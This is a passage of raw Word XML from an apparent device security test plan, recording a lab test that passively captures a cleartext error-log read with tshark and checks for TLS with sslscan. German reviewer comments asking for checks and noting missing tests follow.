              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21DCBA2A" w14:textId="77777777" w:rsidR="00FE14E9" w:rsidRPr="006E4D50" w:rsidRDefault="00FE14E9"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DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E11A3E" w14:textId="77777777" w:rsidR="00FE14E9" w:rsidRPr="006E4D50" w:rsidRDefault="00FE14E9"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laptop mirror NIC (Wireshark, no IP); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365CA859" w14:textId="2BDEAEB5" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="00FE14E9"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read triggered from Pi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="68D9CA6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DABD85" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DA3C30" w14:textId="77777777" w:rsidR="007460F5" w:rsidRPr="006E4D50" w:rsidRDefault="007460F5" w:rsidP="007460F5">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tshark/Wireshark (passive), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5DBAF3" w14:textId="00156BEE" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="007460F5" w:rsidP="007460F5">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sslscan (per ifm CM-005)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="2713C4A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637A2C0" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D6D0F0" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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TC-RQ014-02 Passive cleartext capture of the tracing-log read + confirm no TLS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211A5A49" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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(laptop mirror)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B0666DC" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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24"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tshark -i eth0 -Y 'http &amp;&amp; frame contains "errorlog"' -w TC1402_log_http.pcapng &amp;</w:t>
            </w:r>
            <w:commentRangeEnd w:id="24"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="24"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA4AC37" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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(trigger from Pi)</w:t>
            </w:r>
            <w:commentRangeStart w:id="25"/>
          </w:p>
          <w:p w14:paraId="3B6F667D" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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curl -s http://192.168.0.2/devicestatus/errorlog/loglist &gt;/dev/null</w:t>
            </w:r>
            <w:commentRangeEnd w:id="25"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="25"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBB9F34" w14:textId="77777777" w:rsidR="0074361F" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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confirm no HTTPS endpoint</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAAA89F" w14:textId="27D766E8" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="0074361F"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26"/>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sslscan 192.168.0.2:443 | tee TC1402_tls.txt # expect: no TLS / connection refused</w:t>
            </w:r>
            <w:commentRangeEnd w:id="26"/>
            <w:r w:rsidR="00ED5491" w:rsidRPr="006E4D50">
              <w:rPr>
                <w:rStyle w:val="Kommentarzeichen"/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:commentReference w:id="26"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00FD6890" w14:paraId="3499C35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6C6CA0" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172ECF53" w14:textId="77777777" w:rsidR="009E5D9B" w:rsidRPr="006E4D50" w:rsidRDefault="009E5D9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Cleartext log content visible in the PCAP; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64EEB4C5" w14:textId="4977E23B" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="009E5D9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sslscan finds no TLS (SRIO-7907</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="6942FC6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9E75E96" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07147BFD" w14:textId="77777777" w:rsidR="00130ECB" w:rsidRPr="006E4D50" w:rsidRDefault="00130ECB"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cleartext log captured ?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C2457A5" w14:textId="70CD595C" w:rsidR="00F25477" w:rsidRPr="006E4D50" w:rsidRDefault="00130ECB"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>No HTTPS available ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25477" w:rsidRPr="00EE7A74" w14:paraId="2ECAA00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DAD73C" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="278EDD40" w14:textId="53848A27" w:rsidR="00F25477" w:rsidRPr="00EE3A78" w:rsidRDefault="00A24EB6" w:rsidP="00A24EB6">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1006"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC1402_log_http.pcapng (highlighted log content), TC1402_tls.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A24EB6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D5FB03E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABCCF7D" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1596793F" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00106294">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F25477">
      <w:footerReference w:type="default" r:id="rId16"/>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uber, Nathalie" w:date="2026-08-27T09:57:00Z" w:initials="NN">
    <w:p w14:paraId="28D136BB" w14:textId="77777777" w:rsidR="000875F9" w:rsidRDefault="000875F9" w:rsidP="000875F9">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überpüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="1" w:author="Nuber, Nathalie" w:date="2026-08-27T11:24:00Z" w:initials="NN">
    <w:p w14:paraId="2279D19F" w14:textId="77777777" w:rsidR="0071234B" w:rsidRDefault="0071234B" w:rsidP="0071234B">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="2" w:author="Nathalie Nuber" w:date="2026-08-28T18:13:00Z" w:initials="NN">
    <w:p w14:paraId="6B7088F3" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 2 und Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="3" w:author="Nathalie Nuber" w:date="2026-08-28T18:36:00Z" w:initials="NN">
    <w:p w14:paraId="3BCE98BF" w14:textId="77777777" w:rsidR="009A4BFD" w:rsidRDefault="009A4BFD" w:rsidP="009A4BFD">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 2 und Test 5 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="Nathalie Nuber" w:date="2026-08-28T18:51:00Z" w:initials="NN">
    <w:p w14:paraId="28B0B693" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 3 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="5" w:author="Nathalie Nuber" w:date="2026-08-28T19:08:00Z" w:initials="NN">
    <w:p w14:paraId="3D830D0E" w14:textId="77777777" w:rsidR="002C1914" w:rsidRDefault="002C1914" w:rsidP="002C1914">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Kein STRIDE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="6" w:author="Nathalie Nuber" w:date="2026-08-28T19:11:00Z" w:initials="NN">
    <w:p w14:paraId="33DA19DE" w14:textId="77777777" w:rsidR="00517F08" w:rsidRDefault="00447719" w:rsidP="00517F08">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="00517F08">
        <w:t>Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="7" w:author="Nuber, Nathalie" w:date="2026-08-31T09:05:00Z" w:initials="NN">
    <w:p w14:paraId="12C44F5C" w14:textId="77777777" w:rsidR="006D7569" w:rsidRDefault="006D7569" w:rsidP="006D7569">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 3 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="8" w:author="Nathalie Nuber" w:date="2026-08-28T19:48:00Z" w:initials="NN">
    <w:p w14:paraId="612DC8C0" w14:textId="3244E2E7" w:rsidR="004D759F" w:rsidRDefault="004D759F" w:rsidP="004D759F">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="9" w:author="Nathalie Nuber" w:date="2026-08-28T19:51:00Z" w:initials="NN">
    <w:p w14:paraId="6BAEA88D" w14:textId="77777777" w:rsidR="00863322" w:rsidRDefault="00863322" w:rsidP="00863322">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Kein STRIDE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="10" w:author="Nathalie Nuber" w:date="2026-08-28T19:54:00Z" w:initials="NN">
    <w:p w14:paraId="783C5620" w14:textId="77777777" w:rsidR="00A14100" w:rsidRDefault="00A14100" w:rsidP="00A14100">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Kein STRIDE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="11" w:author="Nathalie Nuber" w:date="2026-08-28T19:57:00Z" w:initials="NN">
    <w:p w14:paraId="11806660" w14:textId="77777777" w:rsidR="00461264" w:rsidRDefault="00461264" w:rsidP="00461264">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Kein STRIDE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="12" w:author="Nathalie Nuber" w:date="2026-08-29T23:21:00Z" w:initials="NN">
    <w:p w14:paraId="1CC898DA" w14:textId="77777777" w:rsidR="00561F87" w:rsidRDefault="00D32AE1" w:rsidP="00561F87">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="00561F87">
        <w:t>Test 5 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="13" w:author="Nathalie Nuber" w:date="2026-08-29T23:39:00Z" w:initials="NN">
    <w:p w14:paraId="610B0F9A" w14:textId="77777777" w:rsidR="007C59FA" w:rsidRDefault="007C59FA" w:rsidP="007C59FA">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="14" w:author="Nathalie Nuber" w:date="2026-08-30T00:14:00Z" w:initials="NN">
    <w:p w14:paraId="142D4636" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00E60591">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 1 und Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="15" w:author="Nathalie Nuber" w:date="2026-08-30T00:26:00Z" w:initials="NN">
    <w:p w14:paraId="775ADC1D" w14:textId="77777777" w:rsidR="00873FC0" w:rsidRDefault="00873FC0" w:rsidP="00873FC0">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Kein STRIDE</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="16" w:author="Nuber, Nathalie" w:date="2026-08-28T13:25:00Z" w:initials="NN">
    <w:p w14:paraId="1FE13A87" w14:textId="77777777" w:rsidR="00D1751D" w:rsidRDefault="00D1751D" w:rsidP="00D1751D">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 3 und Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="17" w:author="Nuber, Nathalie" w:date="2026-08-28T14:51:00Z" w:initials="NN">
    <w:p w14:paraId="08E95643" w14:textId="77777777" w:rsidR="00F0672F" w:rsidRDefault="00F0672F" w:rsidP="00F0672F">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="18" w:author="Nuber, Nathalie" w:date="2026-08-28T15:15:00Z" w:initials="NN">
    <w:p w14:paraId="7F709807" w14:textId="77777777" w:rsidR="0043051B" w:rsidRDefault="0043051B" w:rsidP="0043051B">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="19" w:author="Nuber, Nathalie" w:date="2026-08-28T13:23:00Z" w:initials="NN">
    <w:p w14:paraId="08323C9E" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Test 1 und Test 4 fehlt</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="20" w:author="Nuber, Nathalie" w:date="2026-08-28T11:38:00Z" w:initials="NN">
    <w:p w14:paraId="2FB4566D" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00CC37BA">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="21" w:author="Nuber, Nathalie" w:date="2026-08-28T13:09:00Z" w:initials="NN">
    <w:p w14:paraId="34645589" w14:textId="77777777" w:rsidR="00906341" w:rsidRDefault="00906341" w:rsidP="00A80FE8">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Überprüfen und Quelle</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="22" w:author="Nuber, Nathalie" w:date="2026-08-28T09:05:00Z" w:initials="NN">
    <w:p w14:paraId="108D9352" w14:textId="77777777" w:rsidR="00BF7D4F" w:rsidRDefault="00BF7D4F" w:rsidP="00BF7D4F">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Gehört ja eigentlich nicht zu 1</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="23" w:author="Nuber, Nathalie" w:date="2026-08-28T09:02:00Z" w:initials="NN">
    <w:p w14:paraId="47B9D5B8" w14:textId="77777777" w:rsidR="00F25477" w:rsidRDefault="00F25477" w:rsidP="00F25477">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überpüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="24" w:author="Nuber, Nathalie" w:date="2026-08-28T09:09:00Z" w:initials="NN">
    <w:p w14:paraId="356FD898" w14:textId="77777777" w:rsidR="0074361F" w:rsidRDefault="0074361F" w:rsidP="0074361F">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="25" w:author="Nuber, Nathalie" w:date="2026-08-28T09:09:00Z" w:initials="NN">
    <w:p w14:paraId="3F8BFA04" w14:textId="77777777" w:rsidR="0074361F" w:rsidRDefault="0074361F" w:rsidP="0074361F">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>überprüfen</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="26" w:author="Nuber, Nathalie" w:date="2026-08-28T09:10:00Z" w:initials="NN">
    <w:p w14:paraId="12E17D94" w14:textId="77777777" w:rsidR="00ED5491" w:rsidRDefault="00ED5491" w:rsidP="00ED5491">
      <w:pPr>
        <w:pStyle w:val="Kommentartext"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:t>Befehl ist etwas anders als bei CM-005, warum?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D136BB" w15:done="0"/>
  <w15:commentEx w15:paraId="2279D19F" w15:done="0"/>
  <w15:commentEx w15:paraId="6B7088F3" w15:done="0"/>
  <w15:commentEx w15:paraId="3BCE98BF" w15:done="0"/>
  <w15:commentEx w15:paraId="28B0B693" w15:done="0"/>
  <w15:commentEx w15:paraId="3D830D0E" w15:done="0"/>
  <w15:commentEx w15:paraId="33DA19DE" w15:done="0"/>
  <w15:commentEx w15:paraId="12C44F5C" w15:done="0"/>
  <w15:commentEx w15:paraId="612DC8C0" w15:done="0"/>
  <w15:commentEx w15:paraId="6BAEA88D" w15:done="0"/>
  <w15:commentEx w15:paraId="783C5620" w15:done="0"/>
  <w15:commentEx w15:paraId="11806660" w15:done="0"/>
  <w15:commentEx w15:paraId="1CC898DA" w15:done="0"/>
  <w15:commentEx w15:paraId="610B0F9A" w15:done="0"/>
  <w15:commentEx w15:paraId="142D4636" w15:done="0"/>
  <w15:commentEx w15:paraId="775ADC1D" w15:done="0"/>
  <w15:commentEx w15:paraId="1FE13A87" w15:done="0"/>
  <w15:commentEx w15:paraId="08E95643" w15:done="0"/>
  <w15:commentEx w15:paraId="7F709807" w15:done="0"/>
  <w15:commentEx w15:paraId="08323C9E" w15:done="0"/>
  <w15:commentEx w15:paraId="2FB4566D" w15:done="0"/>
  <w15:commentEx w15:paraId="34645589" w15:done="0"/>
  <w15:commentEx w15:paraId="108D9352" w15:done="0"/>
  <w15:commentEx w15:paraId="47B9D5B8" w15:done="0"/>
  <w15:commentEx w15:paraId="356FD898" w15:done="0"/>
  <w15:commentEx w15:paraId="3F8BFA04" w15:done="0"/>
  <w15:commentEx w15:paraId="12E17D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0E4A60" w16cex:dateUtc="2026-08-27T07:57:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="6E89E6FF" w16cex:dateUtc="2026-08-27T09:24:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="1DCEB83C" w16cex:dateUtc="2026-08-28T16:13:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="17CA87F6" w16cex:dateUtc="2026-08-28T16:36:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="770144F7" w16cex:dateUtc="2026-08-28T16:51:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="5595E888" w16cex:dateUtc="2026-08-28T17:08:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="02B87E86" w16cex:dateUtc="2026-08-28T17:11:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="278E3ED7" w16cex:dateUtc="2026-08-31T07:05:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="11F824F0" w16cex:dateUtc="2026-08-28T17:48:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="13DC752A" w16cex:dateUtc="2026-08-28T17:51:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="3668E054" w16cex:dateUtc="2026-08-28T17:54:00Z"/>
